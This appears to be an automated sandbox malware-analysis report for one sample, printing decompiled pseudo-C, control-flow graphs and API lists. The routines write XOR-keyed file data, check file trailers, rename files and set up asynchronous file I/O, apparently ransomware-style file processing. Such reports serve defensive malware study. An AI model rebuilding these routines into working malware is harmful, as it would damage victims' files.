                0x010fa6ea
                0x010fa6fb
                0x010fa702
                0x010fa714
                0x010fa71a
                0x010fa721
                0x010fa728
                0x010fa72b
                0x010fa731
                0x010fa738
                0x010fa73f
                0x010fa744
                0x010fa744
                0x010fa74a
                0x010fa74d
                0x010fa74d
                0x010fa750
                0x010fa753
                0x010fa758
                0x010fa75e
                0x010fa764
                0x010fa76a
                0x010fa77a
                0x010fa780
                0x010fa785
                0x010fa7a1
                0x010fa7a1
                0x010fa7a6
                0x010fa7b1
                0x010fa7bb
                0x010fa7ce
                0x010fa7dd
                0x010fa7e3
                0x010fa7e6
                0x00000000
                0x010fa7d0
                0x010fa7d0
                0x010fa7d5
                0x00000000
                0x010fa7d5
                0x010fa7bd
                0x010fa7bd
                0x010fa7c2
                0x010fa7ef
                0x010fa7ef
                0x010fa7fa
                0x010fa80c
                0x010fa812
                0x010fa817
                0x010fa819
                0x010fa819
                0x010fa833
                0x010fa839
                0x010fa840
                0x010fa86e
                0x010fa875
                0x010fa8a0
                0x010fa8ed
                0x010fa8f0
                0x010fa8fe
                0x010fa904
                0x010fa912
                0x010fa91a
                0x010fa94f
                0x010fa956
                0x010fa95d
                0x010fa963
                0x010fa967
                0x010fa968
                0x010fa969
                0x010fa96b
                0x010fa976
                0x00000000
                0x010fa99c
                0x010fa99c
                0x010fa9ae
                0x010fa9b6
                0x010fa9bf
                0x010fa9c4
                0x010fa9cb
                0x010fa9d5
                0x010fa9d6
                0x010fa9d9
                0x010fa9dc
                0x010fa9e7
                0x010fa9fa
                0x010fa9fd
                0x010faa03
                0x010faa13
                0x010faa18
                0x00000000
                0x00000000
                0x010faa0c
                0x010fa9e9
                0x010fa9ec
                0x010fa9f1
                0x00000000
                0x010fa9f1
                0x00000000
                0x010fa9cd
                0x010fa9b8
                0x00000000
                0x010fa9b8
                0x010fa9b6
                0x010fa91c
                0x010fa91f
                0x010fa928
                0x010fa92e
                0x010fa935
                0x010fa93d
                0x010fa943
                0x010fa946
                0x00000000
                0x010fa946
                0x010fa8a2
                0x010fa8a2
                0x010fa8a9
                0x010fa8b3
                0x010fa8b7
                0x010fa8b8
                0x010fa8ba
                0x010fa8c5
                0x010fa8cc
                0x010fa8d3
                0x010fa8d8
                0x010fa8d9
                0x010fa8db
                0x010fa8e6
                0x00000000
                0x010fa8e8
                0x00000000
                0x010fa8e8
                0x010fa8c7
                0x010faa23
                0x010faa26
                0x010faa2f
                0x010faa35
                0x010faa3c
                0x010faa44
                0x010faa4a
                0x010faa4d
                0x00000000
                0x010faa4d
                0x010fa8c5
                0x010fa877
                0x010fa87a
                0x010fa880
                0x010fa888
                0x010fa88e
                0x010fa891
                0x00000000
                0x010fa891
                0x010fa842
                0x010fa843
                0x010fa849
                0x010fa84c
                0x00000000
                0x010fa84c
                0x010fa840
                0x010fa787
                0x010fa788
                0x010fa78e
                0x010fa791
                0x00000000
                0x010fa791
                0x00000000
                0x010fa785
                0x00000000
                0x010fa723
                0x00000000
                0x010fa704
                0x00000000
                0x010fa6ec
                0x00000000
                0x010fa6d9
                0x00000000
                0x010fa6c6
                0x00000000
                0x010fa69d
                0x00000000
                0x010fa682
                0x00000000
                0x010fa65d
                0x00000000
                0x010fa64e
                0x010faa5b
                0x010faa5f
                0x010faa64
                0x010faa64
                0x010faa6e
                0x010faa73
                0x010faa73
                0x010faa7d
                0x010faa82
                0x010faa82
                0x010faa8c
                0x010faa91
                0x010faa91
                0x010faa9a
                0x010faa9f
                0x010faa9f
                0x010faaa8
                0x010faaad
                0x010faaad
                0x010faab6
                0x010faabb
                0x010faabb
                0x010faac4
                0x010faac9
                0x010faac9
                0x010faad2
                0x00000000
                0x010faad7
                0x010faae4

                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6293c4097a250a51fe4830843ab076cd1d4c27ac381230ee452de7254341da95
                • Instruction ID: 5332d675ab28a886519e787dcd42a944e3a7a51ac7d323a2a7d8933357972a59
                • Opcode Fuzzy Hash: 6293c4097a250a51fe4830843ab076cd1d4c27ac381230ee452de7254341da95
                • Instruction Fuzzy Hash: 5BE16D70E00209EFDB229B94CD4ABEEBBB4FF04301F1480A9E656B7590D3B55A98CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 459 10f9b34-10f9b66 CreateFileW 460 10f9c4c-10f9c55 459->460 461 10f9b6c-10f9b7d 459->461 462 10f9b80-10f9bae call 10f1769 WriteFile 461->462 465 10f9bb5-10f9bb8 462->465 466 10f9bb0 462->466 468 10f9bbf-10f9bdc WriteFile 465->468 469 10f9bba 465->469 467 10f9c3c-10f9c45 466->467 467->460 470 10f9bde 468->470 471 10f9be0-10f9be3 468->471 469->467 470->467 473 10f9be7-10f9c07 WriteFile 471->473 474 10f9be5 471->474 475 10f9c0b-10f9c0e 473->475 476 10f9c09 473->476 474->467 477 10f9c12-10f9c2f WriteFile 475->477 478 10f9c10 475->478 476->467 479 10f9c33-10f9c36 477->479 480 10f9c31 477->480 478->467 479->462 479->467 480->467
                C-Code - Quality: 70%
                			E010F9B34(WCHAR* _a4) {
                				long _v8;
                				void* _v12;
                				long _v16;
                				void _v17;
                				char _v24;
                				void* _t26;
                				char _t28;
                				signed char _t30;
                				signed char _t34;
                				signed char _t38;
                				signed char _t42;
                				int _t46;
                				unsigned int _t48;
                				signed char _t49;
                				intOrPtr _t50;
                				void* _t51;
                				void* _t52;
                				void* _t53;
                
                				_v8 = 0;
                				_t26 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x80, 0); // executed
                				_v12 = _t26;
                				if(_v12 != 0xffffffff) {
                					_t50 =  *0x1100ff0; // 0x60c
                					_t28 =  *0x1102000; // 0xffcaa1ea
                					_v24 = _t28;
                					while(1) {
                						_t30 = E010F1769( *0x1102000,  &_v24);
                						_t48 = _t30;
                						asm("lodsb");
                						_v17 = _t30 ^ _t48;
                						_t34 = WriteFile(_v12,  &_v17, 1,  &_v16, 0); // executed
                						if(_t34 == 0) {
                							break;
                						}
                						_t51 = _t50 - 1;
                						if(_t51 != 0) {
                							asm("lodsb");
                							_v17 = _t34 ^ _t48;
                							_t38 = WriteFile(_v12,  &_v17, 1,  &_v16, 0); // executed
                							if(_t38 != 0) {
                								_t52 = _t51 - 1;
                								if(_t52 != 0) {
                									_t49 = _t48 >> 0x10;
                									asm("lodsb");
                									_v17 = _t38 ^ _t49;
                									_t42 = WriteFile(_v12,  &_v17, 1,  &_v16, 0); // executed
                									if(_t42 != 0) {
                										_t53 = _t52 - 1;
                										if(_t53 != 0) {
                											asm("lodsb");
                											_v17 = _t42 ^ _t49;
                											_t46 = WriteFile(_v12,  &_v17, 1,  &_v16, 0); // executed
                											if(_t46 != 0) {
                												_t50 = _t53 - 1;
                												if(_t50 != 0) {
                													continue;
                												}
                											} else {
                											}
                										} else {
                										}
                									} else {
                									}
                								} else {
                								}
                							} else {
                							}
                						} else {
                						}
                						L17:
                						 *0x1101354(_v12);
                						_v8 = 1;
                						goto L18;
                					}
                					goto L17;
                				}
                				L18:
                				return _v8;
                			}





















                0x010f9b3d
                0x010f9b59
                0x010f9b5f
                0x010f9b66
                0x010f9b6c
                0x010f9b78
                0x010f9b7d
                0x010f9b80
                0x010f9b8a
                0x010f9b8f
                0x010f9b91
                0x010f9b94
                0x010f9ba6
                0x010f9bae
                0x00000000
                0x00000000
                0x010f9bb5
                0x010f9bb8
                0x010f9bbf
                0x010f9bc2
                0x010f9bd4
                0x010f9bdc
                0x010f9be0
                0x010f9be3
                0x010f9be7
                0x010f9bea
                0x010f9bed
                0x010f9bff
                0x010f9c07
                0x010f9c0b
                0x010f9c0e
                0x010f9c12
                0x010f9c15
                0x010f9c27
                0x010f9c2f
                0x010f9c33
                0x010f9c36
                0x00000000
                0x00000000
                0x00000000
                0x010f9c31
                0x00000000
                0x010f9c10
                0x00000000
                0x010f9c09
                0x00000000
                0x010f9be5
                0x00000000
                0x010f9bde
                0x00000000
                0x010f9bba
                0x010f9c3c
                0x010f9c3f
                0x010f9c45
                0x00000000
                0x010f9c45
                0x00000000
                0x010f9bb0
                0x010f9c4c
                0x010f9c55

                APIs
                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,00000000), ref: 010F9B59
                • WriteFile.KERNEL32(000000FF,?,00000001,010F9AFB,00000000,?,?,?,00000000), ref: 010F9BA6
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: File$CreateWrite
                • String ID:
                • API String ID: 2263783195-0
                • Opcode ID: 73170025fa2d39d5940b777bbafba7b3b370b873bea2ad7a5d4dc7b83fa3698b
                • Instruction ID: abe7840a5a151a28f1a84ae1d184058c56832021d8655c0a6e3055fc8dee889b
                • Opcode Fuzzy Hash: 73170025fa2d39d5940b777bbafba7b3b370b873bea2ad7a5d4dc7b83fa3698b
                • Instruction Fuzzy Hash: B631D03194020CBEEF22CA98DC41FEE7BFCEB40718F4040AAFB54A6581D3B05A80D751
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 481 10fb497-10fb4a6 SetThreadPriority 483 10fb4ac-10fb4cb 481->483 485 10fb4cd-10fb4d5 483->485 486 10fb4fb-10fb4fd 483->486 485->486 489 10fb4d7 485->489 487 10fb4ff-10fb502 486->487 488 10fb503-10fb508 486->488 490 10fb50e-10fb540 ReadFile 488->490 491 10fb5bd-10fb5c0 488->491 492 10fb4de-10fb4f3 489->492 495 10fb5b3 490->495 496 10fb542-10fb54d 490->496 493 10fb5c6-10fb5e4 call 10f207c 491->493 494 10fb670-10fb673 491->494 508 10fb4f7 492->508 509 10fb4f5-10fb4f9 492->509 514 10fb5e6-10fb5e8 493->514 515 10fb5f3-10fb5f9 493->515 498 10fb679-10fb6a9 WriteFile 494->498 499 10fb6f6-10fb6f9 494->499 502 10fb72b-10fb74a 495->502 496->495 500 10fb54f-10fb557 496->500 504 10fb6ab-10fb6b6 498->504 505 10fb6f2 498->505 499->502 510 10fb6fb-10fb701 499->510 506 10fb559-10fb573 500->506 507 10fb575-10fb59c 500->507 519 10fb74e-10fb756 502->519 520 10fb74c 502->520 504->505 516 10fb6b8-10fb6db 504->516 505->502 506->495 506->507 540 10fb5af 507->540 541 10fb59e-10fb5a9 507->541 508->492 509->483 511 10fb705-10fb70d 510->511 512 10fb703-10fb729 call 10f5fb3 510->512 511->510 512->502 558 10fb78b 512->558 514->515 521 10fb5ea-10fb5f1 514->521 523 10fb600-10fb61c WriteFile 515->523 544 10fb6ee 516->544 545 10fb6dd-10fb6e8 516->545 530 10fb77c 519->530 531 10fb758 519->531 526 10fb77e-10fb780 520->526 521->523 528 10fb61e-10fb629 523->528 529 10fb666 523->529 532 10fb786 526->532 533 10fb782-10fb785 526->533 528->529 536 10fb62b-10fb64f 528->536 529->502 530->502 530->526 537 10fb75f-10fb774 531->537 532->488 556 10fb662 536->556 557 10fb651-10fb65c 536->557 549 10fb778 537->549 550 10fb776-10fb77a 537->550 540->495 546 10fb5ad 541->546 547 10fb5ab 541->547 544->505 551 10fb6ec 545->551 552 10fb6ea 545->552 546->507 547->495 549->537 550->502 551->516 552->505 556->529 559 10fb65e 557->559 560 10fb660 557->560 558->483 559->529 560->536
                APIs
                • SetThreadPriority.KERNEL32(00000000,00000002), ref: 010FB4A6
                • ReadFile.KERNEL32(?,?,?,?,?), ref: 010FB538
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: FilePriorityReadThread
                • String ID:
                • API String ID: 3643687941-0
                • Opcode ID: e15784eeea69242759ed36172e9ba44297683ae50442474965d70fafcb720862
                • Instruction ID: 5022720b28b324cfcba166e5752735c40e4bda6bebdbd10fd0d716b27bd249dc
                • Opcode Fuzzy Hash: e15784eeea69242759ed36172e9ba44297683ae50442474965d70fafcb720862
                • Instruction Fuzzy Hash: 78917C71904205EBDF268F44C9C6BA937BCFB08714F1402BAEA51CD899E778D680CF51
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 561 10fba64-10fbaa2 SetFileAttributesW CreateFileW 562 10fbb19-10fbb20 561->562 563 10fbaa4-10fbac1 SetFilePointerEx 561->563 564 10fbac3-10fbae0 ReadFile 563->564 565 10fbb10 563->565 564->565 566 10fbae2-10fbaf7 call 10fb84a 564->566 565->562 566->565 569 10fbaf9-10fbb01 566->569 570 10fbb0a-10fbb0b call 10f5fb3 569->570 571 10fbb03 569->571 570->565 571->570
                C-Code - Quality: 69%
                			E010FBA64(WCHAR* _a4) {
                				struct _OVERLAPPED* _v8;
                				void* _v12;
                				long _v16;
                				char _v144;
                				void _v148;
                				void* _t16;
                				int _t20;
                				int _t24;
                				intOrPtr* _t29;
                
                				_v8 = 0;
                				SetFileAttributesW(_a4, 0x80); // executed
                				_t16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0); // executed
                				_v12 = _t16;
                				if(_v12 == 0xffffffff) {
                					L8:
                					return _v8;
                				}
                				asm("sbb edx, 0x0");
                				_push(2);
                				_t20 = SetFilePointerEx(_v12, 0xffffffffffffff7c, 0, 0); // executed
                				if(_t20 != 0) {
                					_t24 = ReadFile(_v12,  &_v148, 0x84,  &_v16, 0); // executed
                					if(_t24 != 0) {
                						_t29 = E010FB84A( &_v144, 0x80);
                						if(_t29 != 0) {
                							if( *_t29 == _v148) {
                								_v8 = 1;
                							}
                							E010F5FB3(_t29);
                						}
                					}
                				}
                				 *0x1101354(_v12);
                				goto L8;
                			}












                0x010fba6e
                0x010fba7d
                0x010fba95
                0x010fba9b
                0x010fbaa2
                0x010fbb19
                0x010fbb20
                0x010fbb20
                0x010fbaad
                0x010fbab0
                0x010fbab9
                0x010fbac1
                0x010fbad8
                0x010fbae0
                0x010fbaf3
                0x010fbaf7
                0x010fbb01
                0x010fbb03
                0x010fbb03
                0x010fbb0b
                0x010fbb0b
                0x010fbaf7
                0x010fbae0
                0x010fbb13
                0x00000000

                APIs
                • SetFileAttributesW.KERNEL32(?,00000080,?), ref: 010FBA7D
                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 010FBA95
                • SetFilePointerEx.KERNEL32(000000FF,-00000084,00000000,00000000,00000002), ref: 010FBAB9
                • ReadFile.KERNEL32(000000FF,?,00000084,?,00000000), ref: 010FBAD8
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: File$AttributesCreatePointerRead
                • String ID:
                • API String ID: 4170910816-0
                • Opcode ID: a0769c9f1e6de3b600a94f3bbd45e00141b1c5506bf509bb4a8931c449593f17
                • Instruction ID: a1c739caec27d79d6d0bb848a266e439882dd1150684c5fd5f6ff863322ec071
                • Opcode Fuzzy Hash: a0769c9f1e6de3b600a94f3bbd45e00141b1c5506bf509bb4a8931c449593f17
                • Instruction Fuzzy Hash: B5114F31A40209FFFB319F68DC46FA97BB9FB04700F5080A8F754AA4D4DBB59A958B14
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 584 10fd34b-10fd38a 585 10fd38f-10fd399 584->585 585->585 586 10fd39b-10fd3bc 585->586 587 10fd3c1-10fd3cb 586->587 587->587 588 10fd3cd-10fd3eb 587->588 590 10fd4b3-10fd4da RegCreateKeyExW 588->590 591 10fd3f1-10fd456 588->591 592 10fd588-10fd58e 590->592 593 10fd4e0-10fd50d RegQueryValueExW 590->593 608 10fd4ae 591->608 609 10fd458-10fd474 591->609 595 10fd50f-10fd538 593->595 596 10fd541-10fd559 call 10f6531 593->596 595->596 601 10fd53a 595->601 604 10fd55b-10fd574 RegDeleteKeyExW 596->604 605 10fd576-10fd57d 596->605 601->596 604->592 605->592 608->592 611 10fd476-10fd49c 609->611 612 10fd4a5 609->612 611->612 614 10fd49e 611->614 612->608 614->612
                APIs
                • RegCreateKeyExW.KERNEL32(80000002,?,00000000,00000000,00000000,00020119,00000000,?,00000000), ref: 010FD4D2
                • RegQueryValueExW.KERNEL32(?,?,00000000,00000004,00000004,00000004), ref: 010FD505
                • RegDeleteKeyExW.KERNEL32(80000002,?,00000100,00000000,000000FF,00000000), ref: 010FD56E
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: CreateDeleteQueryValue
                • String ID:
                • API String ID: 1796729037-0
                • Opcode ID: bdaa5ea065f102b62056afc8f4f526ad658e3bc3e9e25b2a15a30a17e6b18f0a
                • Instruction ID: 21e65f1f6b90ea2e35f78c82b17329058cdcb37aa73d326dec10c7a0651f4620
                • Opcode Fuzzy Hash: bdaa5ea065f102b62056afc8f4f526ad658e3bc3e9e25b2a15a30a17e6b18f0a
                • Instruction Fuzzy Hash: CC611971940209AFEB269F90CD4AFFDBBB8FB04704F0041A9F615EA1A1E7B49A54CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 642 10fbc06-10fbc23 643 10fbc29-10fbc33 call 10fb9b6 642->643 644 10fbd88-10fbd93 642->644 647 10fbc39-10fbc43 call 10fba64 643->647 648 10fbd80-10fbd83 call 10f5fb3 643->648 647->648 652 10fbc49-10fbc5a call 10f6035 647->652 648->644 652->648 655 10fbc60-10fbc6f 652->655 657 10fbc72-10fbc82 MoveFileExW 655->657 658 10fbcbe-10fbce0 CreateFileW 657->658 659 10fbc84-10fbc8f 657->659 660 10fbce7-10fbcf6 call 10fbb23 658->660 661 10fbce2 658->661 662 10fbcb9 659->662 663 10fbc91-10fbcae call 10f5fb3 call 10fb8ae 659->663 671 10fbd09-10fbd1e CreateIoCompletionPort 660->671 672 10fbcf8-10fbd07 call 10f5fb3 660->672 665 10fbd78-10fbd7b call 10f5fb3 661->665 662->665 678 10fbcb5 663->678 679 10fbcb0 663->679 665->648 673 10fbd31-10fbd53 671->673 674 10fbd20-10fbd2f call 10f5fb3 671->674 672->665 684 10fbd66-10fbd71 673->684 685 10fbd55-10fbd64 call 10f5fb3 673->685 674->665 678->657 679->665 684->665 685->665
                C-Code - Quality: 53%
                			E010FBC06(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                				long _v8;
                				void* _v12;
                				WCHAR* _v16;
                				void* _t33;
                				void* _t35;
                				int _t38;
                				void* _t39;
                				void* _t41;
                				void* _t55;
                
                				_v8 = 0;
                				_v16 = 0;
                				if(_a4 == 0) {
                					L22:
                					return _v8;
                				}
                				_t33 = E010FB9B6(_a4); // executed
                				if(_t33 == 0) {
                					L21:
                					E010F5FB3(_a4);
                					goto L22;
                				}
                				_t35 = E010FBA64(_a4); // executed
                				if(_t35 != 0) {
                					goto L21;
                				}
                				_v16 = E010F6035(_a4, 0x14);
                				if(_v16 == 0) {
                					goto L21;
                				} else {
                					 *0x11012d8(_v16,  *0x1100ff4);
                					while(1) {
                						_t38 = MoveFileExW(_a4, _v16, 8); // executed
                						if(_t38 != 0) {
                							break;
                						}
                						if( *[fs:0x34] != 0xb7) {
                							L20:
                							E010F5FB3(_v16);
                							goto L21;
                						}
                						E010F5FB3(_v16);
                						_v16 = E010FB8AE(_a4,  *0x1100ff4);
                						if(_v16 != 0) {
                							continue;
                						} else {
                							goto L20;
                						}
                					}
                					_t39 = CreateFileW(_v16, 0xc0000000, 0, 0, 3, 0x48000000, 0); // executed
                					_v12 = _t39;
                					if(_v12 != 0xffffffff) {
                						_t55 = E010FBB23(_a8, _a12);
                						if(_t55 != 0) {
                							_t41 = CreateIoCompletionPort(_v12,  *0x11015e0, 0, 0); // executed
                							if(_t41 != 0) {
                								 *((intOrPtr*)(_t55 + 0x24)) = _v12;
                								 *(_t55 + 0x28) = 0;
                								_push(_t55);
                								_push(0);
                								_push(0);
                								_push( *0x11015e0);
                								if( *0x11013bc() != 0) {
                									 *0x11013c0(0x11015e4);
                									_v8 = 1;
                								} else {
                									E010F5FB3(_t55);
                									 *0x1101354(_v12);
                								}
                							} else {
                								E010F5FB3(_t55);
                								 *0x1101354(_v12);
                							}
                						} else {
                							E010F5FB3(_t55);
                							 *0x1101354(_v12);
                						}
                					}
                					goto L20;
                				}
                			}












                0x010fbc11
                0x010fbc18
                0x010fbc23
                0x010fbd88
                0x010fbd93
                0x010fbd93
                0x010fbc2c
                0x010fbc33
                0x010fbd80
                0x010fbd83
                0x00000000
                0x010fbd83
                0x010fbc3c
                0x010fbc43
                0x00000000
                0x00000000
                0x010fbc53
                0x010fbc5a
                0x00000000
                0x010fbc60
                0x010fbc69
                0x010fbc72
                0x010fbc7a
                0x010fbc82
                0x00000000
                0x00000000
                0x010fbc8f
                0x010fbd78
                0x010fbd7b
                0x00000000
                0x010fbd7b
                0x010fbc94
                0x010fbca7
                0x010fbcae
                0x00000000
                0x010fbcb0
                0x00000000
                0x010fbcb0
                0x010fbcae
                0x010fbcd3
                0x010fbcd9
                0x010fbce0
                0x010fbcf2
                0x010fbcf6
                0x010fbd16
                0x010fbd1e
                0x010fbd34
                0x010fbd37
                0x010fbd40
                0x010fbd41
                0x010fbd43
                0x010fbd45
                0x010fbd53
                0x010fbd6b
                0x010fbd71
                0x010fbd55
                0x010fbd56
                0x010fbd5e
                0x010fbd5e
                0x010fbd20
                0x010fbd21
                0x010fbd29
                0x010fbd29
                0x010fbcf8
                0x010fbcf9
                0x010fbd01
                0x010fbd01
                0x010fbcf6
                0x00000000
                0x010fbce0

                APIs
                  • Part of subcall function 010FB9B6: SetFileAttributesW.KERNEL32(00000000,00000080,?,00000000,?,?,?), ref: 010FB9D7
                  • Part of subcall function 010FB9B6: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?,?,?), ref: 010FB9EF
                  • Part of subcall function 010FBA64: SetFileAttributesW.KERNEL32(?,00000080,?), ref: 010FBA7D
                  • Part of subcall function 010FBA64: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 010FBA95
                  • Part of subcall function 010FBA64: SetFilePointerEx.KERNEL32(000000FF,-00000084,00000000,00000000,00000002), ref: 010FBAB9
                  • Part of subcall function 010FBA64: ReadFile.KERNEL32(000000FF,?,00000084,?,00000000), ref: 010FBAD8
                • MoveFileExW.KERNEL32(00000000,00000000,00000008,?,?), ref: 010FBC7A
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,48000000,00000000,?,?), ref: 010FBCD3
                  • Part of subcall function 010F5FB3: RtlFreeHeap.NTDLL(?,00000000,?,?,010F7F03,?), ref: 010F5FC4
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: File$Create$Attributes$FreeHeapMovePointerRead
                • String ID:
                • API String ID: 3435568771-0
                • Opcode ID: bbdcba8b04e03c21897d2c494581b719c7d5c34555bfa89889a0e8958bada220
                • Instruction ID: b1767e79ce790060070fbb18d446318adbfba108a73fdd83939915854072da16
                • Opcode Fuzzy Hash: bbdcba8b04e03c21897d2c494581b719c7d5c34555bfa89889a0e8958bada220
                • Instruction Fuzzy Hash: 4341AF30944209FBDF266F61DC06BDD7FB4AF00311F2081ACF651A88E0EBB686909F42
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E010F9A57(void* __eax, intOrPtr _a4, WCHAR** _a8) {
                				WCHAR* _v8;
                				WCHAR* _t21;
                				signed int _t22;
                				long _t26;
                				WCHAR* _t31;
                				WCHAR** _t36;
                
                				if( *0x1100fd4 != 0) {
                					_t21 = E010F6035(_a4, 0x16);
                					_v8 = _t21;
                					if(_v8 != 0) {
                						_t22 = GetFileAttributesW(_v8); // executed
                						if((_t22 & 0x00000010) == 0) {
                							 *0x1101534(_v8);
                							E010F16B4(_v8);
                							 *0x11012d8(_v8,  *0x1100ff8);
                						} else {
                							E010F16B4(_v8);
                							 *0x11012d8(_v8,  *0x1100ff8);
                						}
                						if(_a8 != 0) {
                							_t36 = _a8;
                							if( *_t36 != 0) {
                								_t26 = GetFileAttributesW( *_t36); // executed
                								if(_t26 != 0xffffffff) {
                									CopyFileW( *_t36, _v8, 0); // executed
                									return E010F5FB3(_v8);
                								}
                								E010F5FB3( *_t36);
                							}
                							E010F9B34(_v8); // executed
                							_t31 = _v8;
                							 *_t36 = _t31;
                							return _t31;
                						} else {
                							E010F9B34(_v8);
                							return E010F5FB3(_v8);
                						}
                					}
                					return _t21;
                				}
                				return __eax;
                			}









                0x010f9a65
                0x010f9a71
                0x010f9a76
                0x010f9a7d
                0x010f9a87
                0x010f9a92
                0x010f9ab3
                0x010f9abc
                0x010f9aca
                0x010f9a94
                0x010f9a97
                0x010f9aa5
                0x010f9aab
                0x010f9ad7
                0x010f9aeb
                0x010f9af1
                0x010f9b04
                0x010f9b0d
                0x010f9b1f
                0x00000000
                0x010f9b28
                0x010f9b11
                0x010f9b11
                0x010f9af6
                0x010f9afb
                0x010f9afe
                0x00000000
                0x010f9ad9
                0x010f9adc
                0x00000000
                0x010f9ae4
                0x010f9ad7
                0x00000000
                0x010f9a7d
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ab36cbf140562cba206dc5918704879f1c19eca36184de1b92534396c7437876
                • Instruction ID: 3125806ff1852c5ad3a80f27c0759d8dcc80ba4c8695866a6d690d633fb09383
                • Opcode Fuzzy Hash: ab36cbf140562cba206dc5918704879f1c19eca36184de1b92534396c7437876
